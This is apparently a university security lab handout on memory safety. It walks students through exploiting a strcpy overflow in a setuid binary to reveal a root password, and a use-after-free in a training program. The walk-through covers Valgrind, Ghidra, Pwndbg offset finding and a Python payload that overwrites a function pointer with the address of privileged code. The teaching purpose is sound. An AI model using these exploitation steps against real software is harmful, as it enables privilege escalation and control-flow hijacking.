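NAME_BUF_SIZE = 24  # size of local_28 in Ghidra's output


def make_locals() -> bytearray:
    """Model the locals from low to high addresses: local_28 | local_10."""
    return bytearray(NAME_BUF_SIZE) + bytearray(b"public\x00\x00")


def directory_listed(name: bytes) -> str:
    """Return the directory string ls would receive after the strcpy."""
    frame = make_locals()
    # strcpy copies up to the first null byte, then writes a terminator,
    # without checking the size of local_28
    data = name.split(b"\x00", 1)[0] + b"\x00"
    frame[0:len(data)] = data
    # execlp reads local_10 as a C string, i.e. up to the first null byte
    return bytes(frame[NAME_BUF_SIZE:]).split(b"\x00", 1)[0].decode("ascii")


if __name__ == "__main__":
    print(directory_listed(b"pierre"))
    print(directory_listed(b"A" * NAME_BUF_SIZE + b"private"))
```

The terminator written by strcpy lands exactly on the last byte of local_10, so the overwritten string is cleanly terminated.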

Launching the Attack

Launch the attack with the aforementioned payload:

$ ./setuid01 AAAAAAAAAAAAAAAAAAAAAAAAprivate

This should display the content of the private folder. It contains a file whose name will give you the root password that you can submit to complete the exercise. To check that this password is correct you can try to log in as root with the su command, or use the web app.

Submission

Fill in the corresponding line in the CSV file on the submission git repository, i.e.:

setuid01,password-here

Guided Example

A temporal memory safety violation, also called use after free, is a type of bug corresponding to the following scenario:

int *ptr = malloc(/* ... */); // Allocate a buffer
// do something with the object here ...
free(ptr); // free the buffer: ptr is now a *dangling pointer*
// ...
printf("%d\n", *ptr); // access the freed memory

This can be exploited by an attacker who has some degree of control over the value of the dangling pointer or the content of the memory it points to. In the example above, if the attacker can update the value of ptr (e.g. by overflowing another variable on the stack), then they get an arbitrary memory read primitive through the printf, which displays the memory pointed to by the dangling pointer. This is already a powerful primitive. Other severe consequences include hijacking the application's control flow, as we will achieve in this exercise.

Our Target Program

Download this binary. As usual, you will likely need to give it execution rights with chmod +x temporal01 before executing it.

The program maintains a simple database of usernames and integer IDs. When the program starts it initialises an ID and a name for the administrator, and prompts the user for additional names to add to the database:

$ ./temporal01            
System initialised with admin account:
id: 000, name: Administrator
Enter name of next user to add, "login" to log in as admin, or "quit" to leave: bob
Added bob (id 001)
Enter name of next user to add, "login" to log in as admin, or "quit" to leave: alice
Added alice (id 002)

Typing quit exits the program, and typing login prompts the user for the administrative password before executing some privileged code:

Enter name of next user to add, "login" to log in as admin, or "quit" to leave: login
Enter admin password: test  
Authentication failed!

Similar to the stack smashing exercises, bypassing the password check and running that privileged code is going to be our objective. Analysing the program with checksec gives us the following information:

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   3 Symbols         No    0               4               temporal01

We can see that the stack canary is enabled. This protection makes stack smashing attacks difficult, so we need to find another way.

The Use After Free

Notice that when we exit the program with the quit command, the program seems to misbehave and prints something that is partially garbage:

Enter name of next user to add, "login" to log in as admin, or "quit" to leave: quit
id: 000, name: q�
bye.

At that stage we suspect some form of memory safety related issue, possibly a use after free. To confirm that we can use Valgrind:

$ valgrind ./temporal01
# Quit with the quit command
==125776== Invalid read of size 8
==125776==    at 0x401CDD: main (in /home/pierre/Downloads/temporal01)
==125776==  Address 0x4a4e078 is 56 bytes inside a block of size 64 free'd
==125776==    at 0x484417B: free (vg_replace_malloc.c:872)
==125776==    by 0x401C51: main (in /home/pierre/Downloads/temporal01)
==125776==  Block was alloc'd at
==125776==    at 0x48417B4: malloc (vg_replace_malloc.c:381)
==125776==    by 0x401BC8: main (in /home/pierre/Downloads/temporal01)
# ...

Valgrind indicates that memory that was previously freed by the program is accessed! This is indeed a use after free.

To better understand how it happens we can decompile the binary. Unfortunately here RetDec is not very helpful as it is unable to decompile the code corresponding to the use-after-free (decompiling/disassembling is not an exact science...). Ghidra is more useful for this particular case. In case you do not have it at hand, this is a simplified version of the decompilation of the main function of our program:

undefined8 main(void)
{
  // ...
  undefined8 *__ptr;
  // ...
  undefined8 local_a0;
  // ...
  __ptr = (undefined8 *)malloc(0x40);
  // ...
  free(__ptr);
  local_ac = 1;
  do {
    local_a0 = (char *)malloc(0x40);
    // ...
    gets(local_a0);
    // ...
    (*(code *)__ptr[7])(__ptr);
    // ...
   }
// ...

We can see here that a pointer __ptr is declared and made to point to a buffer allocated with malloc. Later it is freed, and after that free, __ptr is used: (*(code *)__ptr[7])(__ptr);. This code corresponds to the invocation of a function pointer. If we can somehow update the value of that function pointer before it is invoked, we can take over the execution flow to bypass the password check.
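The index in __ptr[7] tells us where the function pointer lives inside the 64-byte block. Here is a small sketch of the arithmetic, assuming Ghidra's undefined8 type is 8 bytes wide (the constant names are illustrative):

```python
ELEMENT_SIZE = 8   # size in bytes of an undefined8 element
INDEX = 7          # index used in (*(code *)__ptr[7])(__ptr)
BLOCK_SIZE = 0x40  # size passed to malloc

# Byte offset of the function pointer from the start of the block
offset = INDEX * ELEMENT_SIZE
print(offset)  # 56

# The pointer occupies the last 8 bytes of the 64-byte block
print(offset + ELEMENT_SIZE == BLOCK_SIZE)  # True
```

This agrees with the Valgrind report above, which flags an invalid read 56 bytes inside a block of size 64.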

How can we modify the value of the pointer? Notice that after it is freed, the program allocates another buffer of the same size (0x40), pointed to by local_a0. Most implementations of malloc aim to limit memory usage and fragmentation: to that end they reuse freed memory for subsequent allocations. So it's likely that the memory pointed to by local_a0 will be very close to the memory pointed to by the dangling pointer.
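This reuse behaviour can be observed directly. The sketch below calls the C library's malloc and free from Python through ctypes. It assumes a Linux system where ctypes.CDLL(None) exposes libc, and the result depends on the allocator, so no particular output is guaranteed.

```python
import ctypes

# Assumption: on Linux, CDLL(None) gives access to the symbols already
# loaded in the running process, including libc's malloc and free.
libc = ctypes.CDLL(None)
libc.malloc.argtypes = [ctypes.c_size_t]
libc.malloc.restype = ctypes.c_void_p
libc.free.argtypes = [ctypes.c_void_p]
libc.free.restype = None

first = libc.malloc(0x40)   # plays the role of __ptr
libc.free(first)            # first is now a dangling address
second = libc.malloc(0x40)  # plays the role of local_a0

print(hex(first), hex(second))
print("same address reused:", first == second)

libc.free(second)
```

When the two addresses match, writes made through the new pointer land directly in the memory that the dangling pointer still refers to.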

Also notice that we can overflow the buffer pointed to by local_a0: it is written to through the infamous gets libc function. gets reads characters from the standard input and writes them into the buffer passed as a parameter. There is no control over how many characters are read and no check for overflow, hence in practice this function should never be used. Here it is going to be convenient for our attack.

The Overflow

To confirm that the buffer pointed to by local_a0 can be overflowed, run the program, input a very long string when prompted, then exit:

$ ./temporal01
System initialised with admin account:
id: 000, name: Administrator
Enter name of next user to add, "login" to log in as admin, or "quit" to leave: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Added xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx (id 001)
Enter name of next user to add, "login" to log in as admin, or "quit" to leave: quit
[1]    136923 segmentation fault  ./temporal01

The segmentation fault error is encouraging. If we try that again in Pwndbg, we can get more information about what happened:

 ► 0x401ceb <main+340>    call   rdx                         <0x7878787878787878>

The CPU tried to jump to address 0x7878787878787878. This address is not mapped or accessible, hence the fault. 0x78 is the ASCII code for the letter x: we have successfully rewritten the function pointer.

The Payload

Our payload will look a bit like the ones we used for stack smashing: a certain amount of padding, followed by the address of the function we want to redirect the control flow to. To find that function you can decompile the binary with RetDec: a function named secret_admin_code is called when the authentication succeeds. This is our target. Let's find its address:

$ nm temporal01  | grep secret_admin_code
0000000000401ad2 T secret_admin_code

Then to find the amount of padding required, the best way is to use the cyclic feature of Pwndbg:

pwndbg> cyclic 200
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
pwndbg> run
System initialised with admin account:
id: 000, name: Administrator
Enter name of next user to add, "login" to log in as admin, or "quit" to leave: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
Added aaaaaaaabaaaaaaacaaaaaaadaaaaaaa (id 001)
Enter name of next user to add, "login" to log in as admin, or "quit" to leave: quit
► 0x401ceb <main+340>    call   rdx                         <0x6161616161616168>

Let's find the offset where 0x6161616161616168 is located in the cyclic pattern:

pwndbg> cyclic -l 0x6161616161616168
Finding cyclic pattern of 8 bytes: b'haaaaaaa' (hex: 0x6861616161616161)
Found at offset 56
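What cyclic -l does here can be reproduced by hand. The sketch below rebuilds the 200-byte pattern shown above, converts the faulting address to its in-memory byte order, and searches for it. Note that this simple construction only matches the first 200 bytes of the pattern and is not Pwndbg's actual generator.

```python
# Rebuild the pattern printed by `cyclic 200`: 25 chunks of 8 bytes, each a
# distinct letter followed by seven 'a' characters.
pattern = b"".join(bytes([ord("a") + i]) + b"a" * 7 for i in range(25))

# Address the CPU tried to call, as shown by Pwndbg
fault_address = 0x6161616161616168

# In memory the value is little-endian, so the 'h' (0x68) comes first.
needle = fault_address.to_bytes(8, "little")

print(needle)                # b'haaaaaaa'
print(pattern.find(needle))  # 56
```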

Our payload should then be: 56 bytes of padding, followed by 0x401ad2, the address where we want to jump to when the function pointer is invoked.

Launching the Attack

We can then prepare our payload with Python:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*56 + (0x401ad2).to_bytes(8, 'little') + b'\n' + b'quit')" > input.txt
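Before launching, it can help to check the layout of the payload. The sketch below rebuilds the same bytes in memory, using struct.pack as an equivalent alternative to int.to_bytes, and prints two sanity checks. The constant names are illustrative; the offset and address are the ones found above.

```python
import struct

PADDING = 56       # offset found with cyclic -l
TARGET = 0x401ad2  # address of secret_admin_code reported by nm

# "<Q" packs an unsigned 64-bit integer in little-endian byte order.
payload = b"A" * PADDING + struct.pack("<Q", TARGET) + b"\n" + b"quit"

print(len(payload))                        # 69
print(payload[PADDING:PADDING + 8].hex())  # d21a400000000000
```

The first line of the payload is read as a user name and overwrites the function pointer; the second line is the quit command.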

And launch the attack:

$ ./temporal01 < input.txt

When the privileged code runs it will display the password you need for submitting this part of the exercise.

Submission

Fill in the corresponding line in the CSV file on the submission git repository, i.e.:

temporal01,password-here

Advanced Temporal Safety

The following binaries are variations of the one we exploited in the guided part of this exercise. They present a similar use after free vulnerability with a function pointer that can be rewritten to point to privileged code that will display a password. Once you have found the passwords, add them to your submission.

Submission

Fill in the corresponding lines in the CSV file on the submission git repository, i.e.:

temporal02,password-for-temporal02-here
temporal03,password-for-temporal03-here
temporal04,password-for-temporal04-here


COMP60261 Lab 2: Memory Safety